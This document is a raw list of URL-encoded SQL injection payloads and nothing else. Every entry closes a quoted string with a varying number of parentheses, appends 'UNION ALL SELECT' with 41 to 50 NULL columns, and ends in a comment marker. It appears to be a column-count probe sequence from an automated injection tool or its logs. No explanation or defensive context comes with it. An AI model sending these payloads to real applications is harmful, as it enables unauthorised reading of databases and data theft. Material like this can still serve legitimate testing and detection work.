foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 